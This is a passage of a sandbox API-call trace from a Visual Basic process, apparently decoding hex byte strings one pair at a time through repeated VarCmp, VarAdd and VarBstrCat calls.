pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.184] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.184] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.184] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.184] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.184] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.184] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.184] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.184] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.184] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.185] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.185] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.185] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.185] VarBstrCat (in: bstrLeft="&H9", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.185] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.185] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.185] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.185] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.185] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.186] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.186] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.186] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.186] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.186] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.186] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.186] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.186] VarBstrCat (in: bstrLeft="&Hc", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.186] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.187] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.187] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.187] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.187] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.188] VarBstrCat (in: bstrLeft="&Hb", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.188] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.188] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.188] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.188] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.188] VarBstrCat (in: bstrLeft="&H0", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.188] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.189] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.189] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.189] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.189] VarBstrCat (in: bstrLeft="&H8", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.189] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.190] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.190] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.190] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.190] VarBstrCat (in: bstrLeft="&Hf", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.190] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.190] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.190] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.191] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.191] VarBstrCat (in: bstrLeft="&H9", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.191] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.191] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.191] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.191] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.191] VarBstrCat (in: bstrLeft="&H7", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.191] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.192] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.192] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.192] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.192] VarBstrCat (in: bstrLeft="&Hb", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.192] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.193] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.193] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.193] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.193] VarBstrCat (in: bstrLeft="&H0", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.193] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.193] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.193] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.193] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.193] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.193] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.194] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.194] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.194] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.195] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.195] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.196] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.196] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.196] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.196] VarBstrCat (in: bstrLeft="&H6", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.196] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.196] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.196] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.196] VarBstrCat (in: bstrLeft="&H", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.196] VarBstrCat (in: bstrLeft="&H1", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.196] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.197] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.197] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.197] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.197] VarBstrCat (in: bstrLeft="&Hf", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.197] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.197] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.199] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.199] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.199] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.199] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.199] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.199] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.199] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.200] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.200] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.200] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.200] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.201] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.201] VarBstrCat (in: bstrLeft="&Hf", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.201] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.201] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.201] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.201] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.201] VarBstrCat (in: bstrLeft="&Ha", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.202] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.202] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.202] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.202] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.202] VarBstrCat (in: bstrLeft="&Hc", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.202] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.203] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.203] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.203] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.203] VarBstrCat (in: bstrLeft="&H3", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.203] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.203] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.203] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.203] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.203] VarBstrCat (in: bstrLeft="&H3", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.204] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.224] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.224] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.226] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.226] VarBstrCat (in: bstrLeft="&H7", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.228] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.236] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.236] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.237] VarBstrCat (in: bstrLeft="&H", bstrRight="f", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.237] VarBstrCat (in: bstrLeft="&Hf", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.237] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.239] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.239] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.239] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.239] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.239] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.241] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.241] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.241] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.244] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.244] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.246] VarBstrCat (in: bstrLeft="&H", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.246] VarBstrCat (in: bstrLeft="&Hd", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.246] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.248] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.248] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.248] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.248] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.248] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.249] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.249] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.250] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.252] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.252] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.252] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.252] VarBstrCat (in: bstrLeft="&H3", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.252] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.252] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.252] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.252] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.252] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.252] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.252] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.252] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.252] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.252] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.252] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.253] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.253] VarBstrCat (in: bstrLeft="&Ha", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.253] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.253] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.253] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.253] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.253] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.253] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.253] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.253] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.253] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.253] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.253] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.253] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.253] VarBstrCat (in: bstrLeft="&Ha", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.253] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.253] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.253] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.253] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.253] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.254] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.254] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.254] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.254] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.254] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.254] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.254] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.254] VarBstrCat (in: bstrLeft="&Ha", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0096.254] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.254] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.254] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.254] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.254] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.254] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.254] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0096.254] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0096.254] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0096.255] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.255] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0096.255] VarBstrCat (in: bstrLeft="&H", bstrRight="a", 